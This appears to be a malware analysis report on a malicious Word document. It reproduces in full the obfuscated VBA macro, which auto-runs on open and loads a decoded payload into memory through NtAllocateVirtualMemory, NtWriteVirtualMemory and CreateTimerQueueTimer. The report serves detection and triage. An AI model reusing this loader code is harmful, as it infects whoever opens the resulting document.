MALICIOUS
90
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical ClamAV signature (Doc.Downloader.Macro-6539595-0) classifies the file as a downloader macro. The presence of VBA macros, specifically a Document_Open handler, indicates an attempt to execute code automatically when the document is opened. The macro is heavily obfuscated (junk arithmetic, dictionary-word identifiers, conditional-compilation blocks), and the data it decodes appears to be read from a UserForm control (proclaimed.elzevir) whose contents are not part of the extracted macro source, so its specific actions cannot be fully determined from the listing; the signature family indicates its purpose is to download and execute a secondary payload. Note, however, that the extracted source contains no network call and instead declares NtAllocateVirtualMemory, NtWriteVirtualMemory and CreateTimerQueueTimer, so the "downloader" label comes from the signature name while the observable behaviour is closer to in-memory execution of an embedded payload. Detection and triage should therefore key on those Declare statements in combination with the Document_Open auto-execute handler, not only on the ClamAV signature.
Heuristics 4
-
ClamAV: Doc.Downloader.Macro-6539595-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
-
VBA macros detected — medium — 1 related finding — OLE_VBA_MACROS: Document contains VBA macro code
-
Document_Open macro — low — OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script: `Private Sub Document_Open()` (shown with one line of context on either side: `End Function` before it, `Dim collard As Long` after it)
-
Embedded URL info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. The URLs listed below are XMP/RDF, Dublin Core and DrawingML namespace identifiers of the kind that routinely appear in embedded image and document metadata; they are schema names rather than download locations.
URL: http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/ — In document text (OLE body)
- http://purl.org/dc/elements/1.1/ — In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef# — In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11580 bytes |

SHA-256 (of the carved macros.bas, not of the original document): 929956f8f515287af55407e2f9d93451652b93959ab90f871f6584102e32a5f2
Preview script — first 1,000 lines of the extracted (decoded) VBA source, reproduced verbatim as carved:
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function predicator()
Dim gre As Variant
Dim yoyo As Variant
proclaimed.elzevir.Value = Day(#12/5/2013#)
Set atlantic = proclaimed.elzevir.SelectedItem
denture = 33 + 58
Pmt 0, denture, 37465, 59418, 5
announcement = atlantic.Name
sway = 10 - 57 + 7891
wesleyan = Right(announcement, sway)
downandout = hugeness(wesleyan)
kat = 4 + 43
Pmt 0, kat, 6725, 51329, 4
#If (92 - 76 + 384 + 16 - 97 + 381) > ((88 - 15 + 247) - (43 - 99 + 596) * 1) And ((121 - 78 - 15) - (45 - 7 - 10)) * 2 < (Win64) Then
Dim clitoris As LongPtr
Dim collard As LongPtr
Dim ostyak As LongPtr
Dim araucariaceae As LongPtr
Dim hirudinea As LongPtr
cimicidae = 38 - 66 + 2092
#End If
#If (123 - 68 + 345 + 15 - 62 + 347) > ((63 - 106 + 363) - (81 - 13 + 472) * 1) And Not ((9 - 113 + 132) - (31 - 75 + 72)) * 2 < (Win64) Then
Dim collard As Long
Dim clitoris As Long
Dim ostyak As Long
enabling = 51 - 60 + 790
Dim araucariaceae As Long
Dim hirudinea As Long
cimicidae = enabling + 3459
#End If
mad = 60 - 64 + 4
tenpenny = "pallone"
apoapsis = 80 - 31 + 4047
mandara = 7 + 25
Pmt 0, mandara, 30363, 51675, 3
mumbling = "aitch"
calcitration = "unrecognizable"
stevedore = "clash"
extract = cerapteryx
palace = 20 + 56
Pmt 0, palace, 11286, 42318, 8
refrigerate = downandout
saggittary = "maclura"
pluckily = mascot
clitoris = inpatient(refrigerate)
biosystematics = "eubacteria"
Dim down As Long
Dim achimenes As Long
ostyak = 4 - 26 + 22
collard = clitoris + cimicidae
araucariaceae = 55 - 2 + 201474
hirudinea = 52 - 31 + 3479
flash = lurch(araucariaceae, ostyak, _
collard, ostyak, _
ostyak, ostyak, _
ostyak)
buttony = 41 + 58
Pmt 0, buttony, 12018, 30718, 5
End Function
Private Sub Document_Open()
Dim collard As Long
Dim clitoris As Long
Dim ostyak As Long
enabling = 51 - 60 + 790
Dim araucariaceae As Long
Dim hirudinea As Long
cimicidae = enabling + 3459
predicator
coolness = 56 + 47
Pmt 0, coolness, 17173, 34171, 6
End Sub
Attribute VB_Name = "proclaimed"
Attribute VB_Base = "0{6FC50B9F-5586-4D18-855B-91374C093575}{B6FA8E3B-3FF4-46E2-9AD6-EF01FC39883D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module1"
#If (16 - 123 + 507 + 41 - 72 + 331) > ((24 - 78 + 374) - (58 - 116 + 598) * 1) And Not ((56 - 49 + 21) - (71 - 107 + 64)) * 2 < (Win64) Then
Public Declare Function morbosity _
Lib "Ntdll " Alias _
"NtAllocateVirtualMemory" (shortbreathed As Long, revokement As Long, ByVal served As Long, aceraceaeByVal As Long, anthropogenetic As Long, ByVal attache As Long) As Long
#End If
#If (14 - 113 + 499 + 103 - 53 + 250) > ((88 - 17 + 249) - (65 - 44 + 519) * 1) And ((11 - 6 + 23) - (99 - 21 - 50)) * 2 < (Win64) Then
Public Declare PtrSafe Function morbosity _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (anuresis As LongPtr, marvelous As LongPtr, ByVal damselfish As LongPtr, aggravatinglyByVal As LongPtr, methacholine As LongPtr, ByVal between As LongPtr) As LongPtr
#End If
Function fustigation()
Dim chameleon(255) As Byte
biteplate = 13 - 95 + 147
For i = biteplate To (48 - 47 + 90)
chameleon(biteplate) = biteplate - (111 - 118 + 72)
biteplate = biteplate + 1
If (126 - 83 + 48) < biteplate Then
calcimine = hassle + 118 - 44 - 9
Exit For
End If
lavishment = chilling + 48 - 103 + 120
Next
biteplate = (7 - 85 + 126)
For i = biteplate To (18 - 68 + 108)
chameleon(biteplate) = biteplate + (65 - 4 - 57)
biteplate = biteplate + 1
If (84 - 18 - 8) < biteplate Then
perlustration = nightingale + 62 - 34 + 37
Exit For
End If
alcelaphus = azotemic + 90 - 106 + 81
Next
biteplate = (107 - 50 + 40)
For i = biteplate To (17 - 48 + 154)
chameleon(biteplate) = biteplate - (101 - 28 - 2)
biteplate = biteplate + 1
quidnunc = polysyllable + 75 - 57 + 47
If (43 - 11 + 91) < biteplate Then
dreamed = meandrous + 60 - 28 + 33
Exit For
End If
paleornithology = ceryle + 22 - 17 + 60
Next
chameleon(34 - 99 + 112) = (14 - 109 + 158)
biteplate = (76 - 124 + 91)
chameleon(biteplate) = (20 - 58 + 100)
fustigation = chameleon
End Function
Attribute VB_Name = "Module2"
#If (16 - 123 + 507 + 41 - 72 + 331) > ((24 - 78 + 374) - (58 - 116 + 598) * 1) And Not ((56 - 49 + 21) - (71 - 107 + 64)) * 2 < (Win64) Then
Public Declare Function lurch _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (gable As Any, ByVal blighty As Any, ByVal counteous As Any, ByVal andreaea As Any, ByVal crossjack As Any, ByVal brushed As Any, ByVal boston As Any) As Long
#End If
#If (16 - 123 + 507 + 41 - 72 + 331) > ((24 - 78 + 374) - (58 - 116 + 598) * 1) And Not ((56 - 49 + 21) - (71 - 107 + 64)) * 2 < (Win64) Then
Public Declare Function christmasberry _
Lib "Ntdll " Alias _
"NtWriteVirtualMemory" (ByVal serratus As Any, ByVal hinny As Any, ByVal cirrocumulus As Any, ByVal diggings As Any, ByVal multistory As Any) As Long
#End If
#If (14 - 113 + 499 + 103 - 53 + 250) > ((88 - 17 + 249) - (65 - 44 + 519) * 1) And ((11 - 6 + 23) - (99 - 21 - 50)) * 2 < (Win64) Then
Public Declare PtrSafe Function lurch _
Lib "Kernel32 " Alias _
"CreateTimerQueueTimer" (benefit As Any, ByVal caroling As Any, ByVal ceratostomella As Any, ByVal excursiion As Any, ByVal halftrack As Any, ByVal fane As Any, ByVal imperiousness As Any) As Long
#End If
Function evict(chromatrope, payoff, populated)
Dim cankered As Variant
Dim ranking As Integer
Dim publico As LongPtr
Dim disconfirming As LongPtr
Dim chausse As LongPtr
Dim caligation As String
Dim accouplement As LongPtr
Dim cromwellian As LongPtr
disconfirming = chromatrope
cromwellian = populated
accouplement = payoff
halfmast = 54 + 20
Pmt 0, halfmast, 6659, 37783, 8
publico = 93 - 88 - 6
focuses = christmasberry(ByVal publico, _
disconfirming, _
accouplement, cromwellian, _
chausse)
ndjamena = Math.Round(142)
End Function
Function hugeness(lactation) As String
Dim ibi(63) As Long
Dim bicolor() As Byte
Dim disbelieve(6962) As Byte
Dim brininess As Long
Dim echinocactus As Integer
Dim ballpoint As String
Dim agastache(63) As Long
Dim chelonia As Long
Dim accompany(63) As Long
Dim tartaran As Long
Dim bended As Long
archiannelid = 102 - 28 + 257974
aircrewman = 62 - 36 + 4070
Dim commendable As Integer
peon = 98 - 104 + 261
champ = 40 - 60 + 4052
carved = 83 - 36 + 262097
ophiurida = 4 - 18 + 270
brutal = 26 - 125 + 65379
Dim moiety As Variant
phyllodoce = 118 - 44 + 16711606
circumcise = 22 - 8 + 50
falciform = 54 - 23 + 65505
highfaluting = 121 - 125 + 67
Dim outbasket As String
mediated = 2 - 25 + 16515095
Dim neologist As String
wisplike = 48 - 88 + 7883
Dim bereaved() As Byte
bereaved = VBA.StrConv(lactation, 120 + 8)
afterimage = 53 + 44
Pmt 0, afterimage, 28655, 42242, 3
circumvolution = 7843
leanto = vbKeyShift - 12
For continence = 0 To circumvolution
If continence Mod 2 = 0 Then
bereaved(continence) = bereaved(continence) - leanto
Else
bereaved(continence) = bereaved(continence) - (leanto - 1)
End If
Next continence
baseforming = 39 + 19
Pmt 0, baseforming, 32447, 48259, 3
echinocactus = 0
meloidae = fustigation
For tartaran = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
accompany(tartaran) = applicability(tartaran, circumcise, 52)
agastache(tartaran) = applicability(tartaran, aircrewman, 52)
ibi(tartaran) = applicability(tartaran, carved, 52)
Next tartaran
yare = 24 + 48
Pmt 0, yare, 5431, 42282, 4
bicolor = bereaved
pendulum = 38 - 53 + 19
begrimed = 2 + 43
Pmt 0, begrimed, 7864, 10398, 3
illsorted = 29 - 106 + 80
similarity = Rnd(464)
similarity = Math.Round(214)
misplacement = illsorted + 1
allfired = 31 - 32 + 3
For brininess = 0 To circumvolution
desired = bicolor(brininess)
wincing = bicolor(brininess + 2)
abaft = agastache(meloidae(bicolor(brininess + 1)))
vassalage = accompany(meloidae(wincing)) + meloidae(bicolor(brininess + illsorted))
bended = ibi(meloidae(desired)) + abaft + vassalage
tartaran = applicability(bended, phyllodoce, 44)
disbelieve(chelonia) = applicability(tartaran, falciform, 34)
tartaran = applicability(bended, brutal, 44)
disbelieve(chelonia + 1) = applicability(tartaran, ophiurida, 34)
disbelieve(chelonia + allfired) = applicability(bended, peon, 44)
chelonia = chelonia + allfired + 1
brininess = brininess + 3
Next
hugeness = disbelieve
End Function
Function inpatient(counterpoison)
#If (25 - 28 + 403 + 92 - 30 + 238) > ((125 - 43 + 238) - (41 - 50 + 549) * 1) And ((67 - 126 + 87) - (30 - 37 + 35)) * 2 < (Win64) Then
Dim minibike As LongPtr
apiarist = 88 - 6 - 74
Dim carunculate As LongPtr
Dim devaluation As LongPtr
Dim inelegant As Long
articulate = VarPtr(minibike)
jamaican = evict(articulate, _
VarPtr(counterpoison) + (49 - 75 + 34), _
apiarist)
#End If
#If (9 - 20 + 411 + 3 - 108 + 405) > ((38 - 2 + 284) - (115 - 108 + 533) * 1) And Not ((24 - 36 + 40) - (1 - 21 + 48)) * 2 < (Win64) Then
Dim minibike As Long
apiarist = 72 - 56 - 12
Dim carunculate As Long
Dim devaluation As Long
articulate = VarPtr(minibike)
jamaican = compensating(articulate, _
VarPtr(counterpoison) + (14 - 58 + 52), _
apiarist)
#End If
emulsifier = 2 - 73 + 70
carunculate = 64 - 123 + 59
gossip = 75 - 26 - 49
devaluation = 115 - 35 + 9525
amerge = 120 - 27 + 4003
astrophysics = 118 - 83 + 29
meanie = morbosity(ByVal emulsifier, _
carunculate, ByVal gossip, _
devaluation, ByVal amerge, _
ByVal astrophysics)
similarity = nul * 1
ndjamena = similarity And 134
unlively = compensating(carunculate, _
minibike, 20 - 46 + 5909)
considerately = 52 + 18
Pmt 0, considerately, 27693, 51449, 7
inpatient = carunculate * 1
considerately = 52 + 18
End Function
Attribute VB_Name = "Module3"
#If (14 - 113 + 499 + 103 - 53 + 250) > ((88 - 17 + 249) - (65 - 44 + 519) * 1) And ((11 - 6 + 23) - (99 - 21 - 50)) * 2 < (Win64) Then
Public Declare PtrSafe Function christmasberry _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal cat As Any, ByVal crosssentential As Any, ByVal monochord As Any, ByVal cloyingly As Any, ByVal marlin As Any) As LongPtr
#End If
Function compensating(wryneck, albuminous, hilarious)
Dim numerose As Long
Dim maryland As Integer
Dim falconer As Long
Dim emaciation As Byte
Dim afflatus As Long
Dim terrene As Integer
Dim pancreatitis As Long
Dim contralto As Variant
Dim assegai As Long
Dim things As Integer
Dim undistracted As Long
ndjamena = nul / 315
blatter = "begrime"
numerose = wryneck
assegai = hilarious
blatter = blatter
afflatus = albuminous
sunscreen = 9 + 37
Pmt 0, sunscreen, 8768, 26249, 4
prolation = "inlaw"
falconer = 1 - 65 + 63
fixoid = christmasberry(ByVal falconer, _
numerose, afflatus, _
assegai, _
pancreatitis)
prolation = "acerb"
End Function
Function applicability(postoperatively, dejection, micromyx)
If micromyx = 34 + (10 / 2 - 5) Then
applicability = postoperatively \ dejection
ElseIf micromyx = 44 + (5 - 3) / 2 - 1 Then
applicability = postoperatively And dejection
ElseIf micromyx = 52 + (56 / 7 - 4 * 2) Then
applicability = postoperatively * dejection
End If
End Function
|
|||